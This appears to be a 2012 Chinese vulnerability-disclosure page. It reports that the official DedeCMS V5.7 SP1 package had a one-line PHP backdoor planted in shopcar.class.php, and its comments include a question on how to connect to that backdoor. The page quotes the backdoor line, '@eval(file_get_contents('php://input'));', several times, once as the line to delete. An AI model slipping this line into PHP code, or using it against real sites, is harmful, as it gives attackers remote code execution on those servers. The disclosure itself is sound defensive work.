漏洞概要
关注数(24)
关注此漏洞
漏洞标题:Dedecms疑似被植入后门
提交时间:2012-03-20 19:30
修复时间:2012-03-20 19:30
公开时间:2012-03-20 19:30
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
DedeCMS V5.7 SP1正式版
UTF-8 GBK版本疑似被植入一句话后门
前几日下载并不存在此代码
详细说明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
漏洞证明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
修复方案:
删除@eval(file_get_contents('php://input'));
漏洞回应
漏洞评价:
评论
-
2012-03-20 19:45 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2012-03-20 19:46 |
zhuowater ( 路人 | Rank:15 漏洞数:2 | 程序员一枚,求妹子一枚)
-
2012-03-20 19:50 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
@zhuowater 是之前的问题都忽略了 这个问题还是公众提前知道好
-
2012-03-20 21:21 |
yeweit6 ( 实习白帽子 | Rank:32 漏洞数:7 | 豫章故郡,洪都新府。星分翼轸,地接衡庐。...)
-
2012-03-21 10:31 |
Z-0ne ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)
-
2012-03-21 11:02 |
icefish ( 普通白帽子 | Rank:104 漏洞数:8 | 欢迎大家和我用邮件进行交流~)
-
2012-03-21 11:06 |
horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)
-
2012-03-21 11:09 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2012-03-21 13:25 |
08fans ( 路人 | Rank:24 漏洞数:6 | 关注网络安全)
果断测试成功。。。http://1.honglousy.sinaapp.com/archives/45
-
2012-03-21 14:57 |
小雨 ( 普通白帽子 | Rank:105 漏洞数:19 | phper)
-
2012-03-21 17:38 |
GaRY ( 实习白帽子 | Rank:39 漏洞数:3 | 真悲剧平男君)
这个问题可以质疑一下厂家的态度,怎么能简单忽略了事?
-
2013-08-08 16:47 |
j2ck3r ( 普通白帽子 | Rank:406 漏洞数:92 | 别关注我,跟你不熟。)
@eval(file_get_contents('php://input')); 这后门怎么连接